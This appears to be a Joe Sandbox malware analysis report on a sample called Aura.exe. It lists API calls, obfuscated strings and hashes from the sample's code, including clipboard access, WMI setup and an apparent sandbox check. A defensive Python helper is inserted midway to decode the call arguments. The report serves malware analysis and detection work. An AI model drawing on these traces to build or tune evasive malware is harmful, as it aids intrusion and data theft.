                                                • GetLastError.KERNEL32 ref: 6CDC4D5F
                                                • __dosmaperr.LIBCMT ref: 6CDC4D66
                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6CDC4DA5
                                                • __dosmaperr.LIBCMT ref: 6CDC4DAC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                • String ID:
                                                • API String ID: 167067550-0
                                                • Opcode ID: 0e40d0b39efabde5674af047331a0270fd9f89bc6e66182db5f83cf649eb16bc
                                                • Instruction ID: e4e911271adb382a2198e6e3329760d340f05410e67bdd73bcd7a575513246e7
                                                • Opcode Fuzzy Hash: 0e40d0b39efabde5674af047331a0270fd9f89bc6e66182db5f83cf649eb16bc
                                                • Instruction Fuzzy Hash: CC21B371B04219AFDB10AF668880D7BB7ADEF0136C7048718F96597E70E771EC509BA2
                                                APIs
                                                • GetLastError.KERNEL32(?,?,?,6CDC8907,?,00000001,6CDC6D14,?,6CDC8DC1,00000001,?,?,?,6CDC6CA3,?,00000000), ref: 6CDC45FC
                                                • _free.LIBCMT ref: 6CDC4659
                                                • _free.LIBCMT ref: 6CDC468F
                                                • SetLastError.KERNEL32(00000000,00000013,000000FF,?,6CDC8DC1,00000001,?,?,?,6CDC6CA3,?,00000000,00000000,6CDD1360,0000002C,6CDC6D14), ref: 6CDC469A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID: ErrorLast_free
                                                • String ID:
                                                • API String ID: 2283115069-0
                                                • Opcode ID: 6693ea1a333b12d84c7bf0ac494bc2e29267d3cfd77c9d51f204bcf446256dcc
                                                • Instruction ID: 0793fd09cfeccfae225bbf3fa6cc30ee825a241d3802b370e46751f23df2721d
                                                • Opcode Fuzzy Hash: 6693ea1a333b12d84c7bf0ac494bc2e29267d3cfd77c9d51f204bcf446256dcc
                                                • Instruction Fuzzy Hash: 6011A3763845016A9B1217B58C80FFA367DABC627DB380725F234D3AF4EF6588095222
                                                APIs
                                                • GetLastError.KERNEL32(?,?,00000001,6CDC4B88,6CDC4C19,?,?,6CDC3E2C), ref: 6CDC4753
                                                • _free.LIBCMT ref: 6CDC47B0
                                                • _free.LIBCMT ref: 6CDC47E6
                                                • SetLastError.KERNEL32(00000000,00000013,000000FF,?,00000001,6CDC4B88,6CDC4C19,?,?,6CDC3E2C), ref: 6CDC47F1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID: ErrorLast_free
                                                • String ID:
                                                • API String ID: 2283115069-0
                                                • Opcode ID: 284e2f72ba7e9e92e04d750e89b7825e2603d3f7708cc1db785944a681f7c3f2
                                                • Instruction ID: 61185a88ab52489b5322530ea0add0c0a87040f59dece4bdfeeeaf53c9fb36be
                                                • Opcode Fuzzy Hash: 284e2f72ba7e9e92e04d750e89b7825e2603d3f7708cc1db785944a681f7c3f2
                                                • Instruction Fuzzy Hash: D911A9753045416AD70227B94C84FBB367D9BC7279B390325F634D3AF0DF658C1946A2
                                                APIs
                                                • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,6CDC95B0,?,00000001,?,00000001,?,6CDC8896,?,?,00000001), ref: 6CDC9B6D
                                                • GetLastError.KERNEL32(?,6CDC95B0,?,00000001,?,00000001,?,6CDC8896,?,?,00000001,?,00000001,?,6CDC8DE2,6CDC6CA3), ref: 6CDC9B79
                                                  • Part of subcall function 6CDC9B3F: CloseHandle.KERNEL32(FFFFFFFE,6CDC9B89,?,6CDC95B0,?,00000001,?,00000001,?,6CDC8896,?,?,00000001,?,00000001), ref: 6CDC9B4F
                                                • ___initconout.LIBCMT ref: 6CDC9B89
                                                  • Part of subcall function 6CDC9B01: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6CDC9B30,6CDC959D,00000001,?,6CDC8896,?,?,00000001,?), ref: 6CDC9B14
                                                • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,6CDC95B0,?,00000001,?,00000001,?,6CDC8896,?,?,00000001,?), ref: 6CDC9B9E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                • String ID:
                                                • API String ID: 2744216297-0
                                                • Opcode ID: ab63bf01d99603d378af2b506e34caf8c4f3b57288cf9c447ffafb4dea284c4c
                                                • Instruction ID: 894b354db0475a73701f1422d0c2c62ab103baf5f7845b4cf7e523b1b838ea1c
                                                • Opcode Fuzzy Hash: ab63bf01d99603d378af2b506e34caf8c4f3b57288cf9c447ffafb4dea284c4c
                                                • Instruction Fuzzy Hash: 17F01C36210155FBCF122FD2CC44E993F7FFB593A8B154110FB1986520CA329A20EB91
                                                APIs
                                                • _free.LIBCMT ref: 6CDC3F2D
                                                  • Part of subcall function 6CDC4BF3: HeapFree.KERNEL32(00000000,00000000,?,6CDC3E2C), ref: 6CDC4C09
                                                  • Part of subcall function 6CDC4BF3: GetLastError.KERNEL32(?,?,6CDC3E2C), ref: 6CDC4C1B
                                                • _free.LIBCMT ref: 6CDC3F40
                                                • _free.LIBCMT ref: 6CDC3F51
                                                • _free.LIBCMT ref: 6CDC3F62
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 87071a1d7f5a79ff41e3322586ed24215461ac5316c54a349130744f9168a8ea
                                                • Instruction ID: 5dbb736420f4449f82336d80816a1379b8cde5b0afe546e01968e38e5efe49fe
                                                • Opcode Fuzzy Hash: 87071a1d7f5a79ff41e3322586ed24215461ac5316c54a349130744f9168a8ea
                                                • Instruction Fuzzy Hash: BBE092BDA101249BDF125FA5AC00AA93A7ABF5A6043055006F41813634EB7B8B669FA6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmp
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: C:\Users\user\Desktop\Aura.exe
                                                • API String ID: 0-2168703445
                                                • Opcode ID: 08909976e4ef5c35b895f312ad75e2fda36ab95b963203f49ebc1849f9b67058
                                                • Instruction ID: af74c49955ee01afd6486da4f493d093a938e374b75ab0189f6d2dce4e5d3476
                                                • Opcode Fuzzy Hash: 08909976e4ef5c35b895f312ad75e2fda36ab95b963203f49ebc1849f9b67058
                                                • Instruction Fuzzy Hash: DE4183B1B04219EBDB11CF99C880ADEBBFCEF86314B140166E504D7760EB718A45CB62

                                                Execution Graph

                                                Execution Coverage: 5.3%
                                                Dynamic/Decrypted Code Coverage: 100%
                                                Signature Coverage: 16.6%
                                                Total number of Nodes: 295
                                                Total number of Limit Nodes: 21

                                                Control-flow Graph

                                                APIs
                                                • CoCreateInstance.OLE32(027C5678,00000000,00000001,027C5668,00000000), ref: 027BA821
                                                • SysAllocString.OLEAUT32(71BF0FBE), ref: 027BA8C6
                                                • CoSetProxyBlanket.COMBASE(00006360,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 027BA908
                                                • SysAllocString.OLEAUT32(71BF0FBE), ref: 027BA957
                                                • SysAllocString.OLEAUT32(71BF0FBE), ref: 027BAA13
                                                • VariantInit.OLEAUT32(?), ref: 027BAA81
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2074850298.0000000002781000.00000020.00000400.00020000.00000000.sdmp, Offset: 02780000, based on PE: true
                                                • Associated: 00000003.00000002.2074829879.0000000002780000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.2074889126.00000000027C4000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.2074907390.00000000027C7000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.2074931226.00000000027D9000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2780000_aspnet_regiis.jbxd
                                                Similarity
                                                • API ID: AllocString$BlanketCreateInitInstanceProxyVariant
                                                • String ID: 3{5}$6C%E$>O5A$@7QI$C$\$`c$cGFY$/.-$h~i
                                                • API String ID: 65563702-3830209669
                                                • Opcode ID: 41fccf851292d4dab630790be11d9ecbe7c1aac9c13b9277f6076024cd4723ff
                                                • Instruction ID: e98528859a09f6d012024cd69f6a8597a9764be63bcf51d9b73d45494654a69e
                                                • Opcode Fuzzy Hash: 41fccf851292d4dab630790be11d9ecbe7c1aac9c13b9277f6076024cd4723ff
                                                • Instruction Fuzzy Hash: BA121171A483019FD720DF25C8857ABFBE1EF85304F148A2CF995AB291D774E905CB92

                                                Control-flow Graph

                                                APIs
                                                • LdrInitializeThunk.NTDLL(02797A82), ref: 027BFAEE
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2074850298.0000000002781000.00000020.00000400.00020000.00000000.sdmp, Offset: 02780000, based on PE: true
                                                • Associated: 00000003.00000002.2074829879.0000000002780000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.2074889126.00000000027C4000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.2074907390.00000000027C7000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.2074931226.00000000027D9000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2780000_aspnet_regiis.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

                                                Control-flow Graph

                                                APIs
                                                • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 02788CE2
                                                • GetCurrentThreadId.KERNEL32 ref: 02788CF5
                                                • GetCurrentProcessId.KERNEL32 ref: 02788CFD
                                                • GetForegroundWindow.USER32 ref: 02788DC1
                                                • ExitProcess.KERNEL32 ref: 02788E3A
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2074850298.0000000002781000.00000020.00000400.00020000.00000000.sdmp, Offset: 02780000, based on PE: true
                                                • Associated: 00000003.00000002.2074829879.0000000002780000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.2074889126.00000000027C4000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.2074907390.00000000027C7000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.2074931226.00000000027D9000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2780000_aspnet_regiis.jbxd
                                                Similarity
                                                • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                • String ID:
                                                • API String ID: 4063528623-0
                                                • Opcode ID: 4afdcb485ea7ccc5683152c5c5c3eee8aa9dcd7fc291b0b85b447461c405d1fc
                                                • Instruction ID: 210cdda4b5f2c276781b6b535f46ebb4d501149272f4762014979d8ddb744652
                                                • Opcode Fuzzy Hash: 4afdcb485ea7ccc5683152c5c5c3eee8aa9dcd7fc291b0b85b447461c405d1fc
                                                • Instruction Fuzzy Hash: 8F316B33F8031917C72C7975DC8E399B5975BC4610F0E853DAC859B3D6EE746C0A8691

                                                Control-flow Graph

                                                • Blocks: 228 27bcfa0-27bcfae; 229 27bcfb9-27bcfca; 230 27bcfb5-27bcfb8; 231 27bcfd0-27bcfe2; 232 27bcfe4-27bcff9 (RtlFreeHeap)
                                                • Edges: 228->229, 228->230, 229->231, 231->231 (loop), 231->232
                                                APIs
                                                • RtlFreeHeap.NTDLL(?,00000000,?), ref: 027BCFF0
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2074850298.0000000002781000.00000020.00000400.00020000.00000000.sdmp, Offset: 02780000, based on PE: true
                                                • Associated: 00000003.00000002.2074829879.0000000002780000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.2074889126.00000000027C4000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.2074907390.00000000027C7000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.2074931226.00000000027D9000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2780000_aspnet_regiis.jbxd
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID:
                                                • API String ID: 3298025750-0
                                                • Opcode ID: da55ecfec5584e092f6af6fc146d1aea69f2f325d9f2b71c2084767ffeae057c
                                                • Instruction ID: 7ad313025bfc9baa6b142f1de7459c6450472646676bd3d4fb1b194e4ddc95c6
                                                • Opcode Fuzzy Hash: da55ecfec5584e092f6af6fc146d1aea69f2f325d9f2b71c2084767ffeae057c
                                                • Instruction Fuzzy Hash: 30F0EC305483008FD7095F34EC6272EBBA1EF86715F90457CE5C546691DA39483ACF02

                                                Control-flow Graph

                                                • Blocks: 233 278d360-278d397 (CoInitializeEx)
                                                APIs
                                                • CoInitializeEx.COMBASE(00000000,00000002), ref: 0278D373
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2074850298.0000000002781000.00000020.00000400.00020000.00000000.sdmp, Offset: 02780000, based on PE: true
                                                • Associated: 00000003.00000002.2074829879.0000000002780000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.2074889126.00000000027C4000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.2074907390.00000000027C7000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.2074931226.00000000027D9000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2780000_aspnet_regiis.jbxd
                                                Similarity
                                                • API ID: Initialize
                                                • String ID:
                                                • API String ID: 2538663250-0
                                                • Opcode ID: 56ffd5d0cf269f5a68561b62e9079c7837fabcefc88dac91412ed531cee59c9d
                                                • Instruction ID: da6ed3a27163a30fa9d691d33f276ea6d2d99e3af994c97aef913cde253047f2
                                                • Opcode Fuzzy Hash: 56ffd5d0cf269f5a68561b62e9079c7837fabcefc88dac91412ed531cee59c9d
                                                • Instruction Fuzzy Hash: BFE0C231FD02046BE3045569EC0BF963AAA8786721F58C62CA151C63C5D97968218166

                                                Control-flow Graph

                                                • Blocks: 234 278d39e-278d3cd (CoInitializeSecurity)
                                                APIs
                                                • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0278D3B0
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2074850298.0000000002781000.00000020.00000400.00020000.00000000.sdmp, Offset: 02780000, based on PE: true
                                                • Associated: 00000003.00000002.2074829879.0000000002780000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.2074889126.00000000027C4000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.2074907390.00000000027C7000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.2074931226.00000000027D9000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2780000_aspnet_regiis.jbxd
                                                Similarity
                                                • API ID: InitializeSecurity
                                                • String ID:
                                                • API String ID: 640775948-0
                                                • Opcode ID: a9bb9766e643d4c6c1594be2c372861b6a788fa3f19cf6204d0751ae62d3bd49
                                                • Instruction ID: 3a0a94a3887ee938ceda9ef5640b85bc4be74549e28cae6b95f561392fba1c67
                                                • Opcode Fuzzy Hash: a9bb9766e643d4c6c1594be2c372861b6a788fa3f19cf6204d0751ae62d3bd49
                                                • Instruction Fuzzy Hash: F7D0C9307D434177F1A54629AC57F203251A301F25F708A0CB762FE3C0C9F07121861D
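Added triage helper (not code from the Joe Sandbox report or from the analysed sample): the listing prints call arguments as bare hex, so the SHGetSpecialFolderPathW(...,00000010,...), CoInitializeEx(00000000,00000002) and CoInitializeSecurity(...,00000000,00000003,...) entries above only become readable once the argument positions are mapped to their Windows SDK constant names. The script parses lines in the listing's own "Api.MODULE(args), ref: addr" form, names those constants, and emits the findings a reviewer would note. The sample trace is constructed by copying the call lines from the entries above; the line format, the CSIDL/COINIT/RPC_C_* tables and the finding heuristics are this example's own assumptions.

```python
"""Decode the raw hex arguments in a Joe Sandbox-style API listing.

Added triage helper, not part of the Joe Sandbox report. The report prints call
arguments as bare hex; the tables below map the documented argument positions
of a few APIs to their SDK constant names so the values can be read directly.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed input: the API lines copied from the function entries above.
SAMPLE_TRACE = """\
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 02788CE2
GetCurrentThreadId.KERNEL32 ref: 02788CF5
GetCurrentProcessId.KERNEL32 ref: 02788CFD
GetForegroundWindow.USER32 ref: 02788DC1
ExitProcess.KERNEL32 ref: 02788E3A
CoInitializeEx.COMBASE(00000000,00000002), ref: 0278D373
CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0278D3B0
"""

# One call per line: Api.MODULE(arg,arg,...), ref: address (the parenthesised part is optional)
LINE_RE = re.compile(
    r"^(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s+ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)

# Constant values from the Windows SDK headers (shlobj.h, objbase.h, rpcdce.h).
CSIDL = {0x00: "CSIDL_DESKTOP", 0x05: "CSIDL_PERSONAL", 0x10: "CSIDL_DESKTOPDIRECTORY",
         0x1A: "CSIDL_APPDATA", 0x1C: "CSIDL_LOCAL_APPDATA", 0x24: "CSIDL_WINDOWS",
         0x25: "CSIDL_SYSTEM", 0x26: "CSIDL_PROGRAM_FILES"}
COINIT_FLAGS = {0x4: "COINIT_DISABLE_OLE1DDE", 0x8: "COINIT_SPEED_OVER_MEMORY"}
AUTHN_LEVEL = {0: "RPC_C_AUTHN_LEVEL_DEFAULT", 1: "RPC_C_AUTHN_LEVEL_NONE",
               2: "RPC_C_AUTHN_LEVEL_CONNECT", 3: "RPC_C_AUTHN_LEVEL_CALL",
               4: "RPC_C_AUTHN_LEVEL_PKT", 5: "RPC_C_AUTHN_LEVEL_PKT_INTEGRITY",
               6: "RPC_C_AUTHN_LEVEL_PKT_PRIVACY"}
IMP_LEVEL = {0: "RPC_C_IMP_LEVEL_DEFAULT", 1: "RPC_C_IMP_LEVEL_ANONYMOUS",
             2: "RPC_C_IMP_LEVEL_IDENTIFY", 3: "RPC_C_IMP_LEVEL_IMPERSONATE",
             4: "RPC_C_IMP_LEVEL_DELEGATE"}


@dataclass
class ApiCall:
    api: str
    module: str
    ref: int                    # code address the sandbox attributed the call to
    args: List[Optional[int]]   # None where the sandbox printed '?'


def parse_trace(text: str) -> List[ApiCall]:
    """Parse every matching line; lines that are not API calls are skipped."""
    calls: List[ApiCall] = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip().lstrip("• ").strip())
        if not m:
            continue
        args: List[Optional[int]] = []
        if m.group("args"):
            args = [None if a == "?" else int(a, 16) for a in m.group("args").split(",")]
        calls.append(ApiCall(m.group("api"), m.group("mod"), int(m.group("ref"), 16), args))
    return calls


def _name(table: Dict[int, str], v: Optional[int]) -> str:
    return "?" if v is None else table.get(v, f"0x{v:X}")


def decode_call(call: ApiCall) -> Dict[str, str]:
    """Name the constants at the documented argument positions of the APIs we know."""
    a, out = call.args, {}
    if call.api == "SHGetSpecialFolderPathW" and len(a) >= 4:
        out["csidl"] = _name(CSIDL, a[2])              # (hwnd, pszPath, csidl, fCreate)
        out["fCreate"] = "TRUE" if a[3] else "FALSE"
    elif call.api == "CoInitializeEx" and len(a) >= 2 and a[1] is not None:
        model = "COINIT_APARTMENTTHREADED" if a[1] & 0x2 else "COINIT_MULTITHREADED"
        out["dwCoInit"] = "|".join([model] + [n for bit, n in COINIT_FLAGS.items() if a[1] & bit])
    elif call.api == "CoInitializeSecurity" and len(a) >= 9:
        # (pSecDesc, cAuthSvc, asAuthSvc, pReserved1, dwAuthnLevel, dwImpLevel,
        #  pAuthList, dwCapabilities, pReserved3). cAuthSvc is reported verbatim: the
        # listing shows 0xFF and we do not assume it is a truncated -1.
        out["cAuthSvc"] = "?" if a[1] is None else f"0x{a[1]:X}"
        out["dwAuthnLevel"] = _name(AUTHN_LEVEL, a[4])
        out["dwImpLevel"] = _name(IMP_LEVEL, a[5])
        out["dwCapabilities"] = "EOAC_NONE" if a[7] == 0 else _name({}, a[7])
    return out


def triage(calls: List[ApiCall]) -> List[str]:
    """Findings a reviewer would want to see from one function's call list."""
    findings: List[str] = []
    apis = [c.api for c in calls]
    for c in calls:
        d = decode_call(c)
        if c.api == "SHGetSpecialFolderPathW":
            findings.append(f"0x{c.ref:08X}: resolves {d['csidl']} (fCreate={d['fCreate']})")
        if c.api == "CoInitializeSecurity" and d.get("dwImpLevel") == "RPC_C_IMP_LEVEL_IMPERSONATE":
            findings.append(f"0x{c.ref:08X}: CoInitializeSecurity with {d['dwAuthnLevel']} / "
                            f"{d['dwImpLevel']}, the argument pattern Microsoft documents for "
                            "WMI/DCOM clients; what is queried afterwards is not shown by the listing")
    if "GetForegroundWindow" in apis and "ExitProcess" in apis:
        findings.append("GetForegroundWindow and ExitProcess in the same function: check whether "
                        "the exit is conditional on the window result (a common sandbox check)")
    return findings


if __name__ == "__main__":
    for line in triage(parse_trace(SAMPLE_TRACE)):
        print(line)
```

Run on the constructed trace, the decoder reports CSIDL 0x10 as CSIDL_DESKTOPDIRECTORY, dwCoInit 2 as COINIT_APARTMENTTHREADED, and the 0 / 3 pair as RPC_C_AUTHN_LEVEL_DEFAULT / RPC_C_IMP_LEVEL_IMPERSONATE. That last combination is the initialisation Microsoft's WMI client examples use, which is why it is worth flagging, but the listing alone does not show which interfaces are used after it, so the finding is phrased as a lead rather than a conclusion. New APIs are added by extending decode_call with their documented parameter order.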

                                                Control-flow Graph

                                                • Blocks: 236 27bcf80-27bcf84 (RtlAllocateHeap)
                                                APIs
                                                • RtlAllocateHeap.NTDLL(?,00000000), ref: 027BCF84
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2074850298.0000000002781000.00000020.00000400.00020000.00000000.sdmp, Offset: 02780000, based on PE: true
                                                • Associated: 00000003.00000002.2074829879.0000000002780000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.2074889126.00000000027C4000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.2074907390.00000000027C7000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.2074931226.00000000027D9000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2780000_aspnet_regiis.jbxd
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: 82a6ac2cf49c24c9aea24ae764d0a584d8ca154dc1e30e0777cd8c67e163661b
                                                • Instruction ID: ada2f6ac8acb7886c745effbbfa4aadd9cb1204fc09254af0feb0fb9a55d86d4
                                                • Opcode Fuzzy Hash: 82a6ac2cf49c24c9aea24ae764d0a584d8ca154dc1e30e0777cd8c67e163661b
                                                • Instruction Fuzzy Hash: 0BA024344C1110D7C3140F105C4DF577D3CF701F41F144404F4004004043701010CD10

                                                Control-flow Graph

                                                • Blocks: 243 278eaf0-278eafc (call 2781bb0, CoUninitialize)
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2074850298.0000000002781000.00000020.00000400.00020000.00000000.sdmp, Offset: 02780000, based on PE: true
                                                • Associated: 00000003.00000002.2074829879.0000000002780000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.2074889126.00000000027C4000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.2074907390.00000000027C7000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.2074931226.00000000027D9000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2780000_aspnet_regiis.jbxd
                                                Similarity
                                                • API ID: Uninitialize
                                                • String ID:
                                                • API String ID: 3861434553-0
                                                • Opcode ID: 5dd4f40cf7cee78710d1763f0a0217dc801c2f83d6e9d11e3aad67b940b3ab4c
                                                • Instruction ID: ae24918b00c2b326a1527d3c41f3bdd4f8b2dd9dde257c842ce313577df19ec8
                                                • Opcode Fuzzy Hash: 5dd4f40cf7cee78710d1763f0a0217dc801c2f83d6e9d11e3aad67b940b3ab4c
                                                • Instruction Fuzzy Hash: 93B012708841018BC3057B31BC0E01939325F40702B400424D80630490F63258648D13
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2074850298.0000000002781000.00000020.00000400.00020000.00000000.sdmp, Offset: 02780000, based on PE: true
                                                • Associated: 00000003.00000002.2074829879.0000000002780000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.2074889126.00000000027C4000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.2074907390.00000000027C7000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000003.00000002.2074931226.00000000027D9000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2780000_aspnet_regiis.jbxd
                                                Similarity
                                                • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
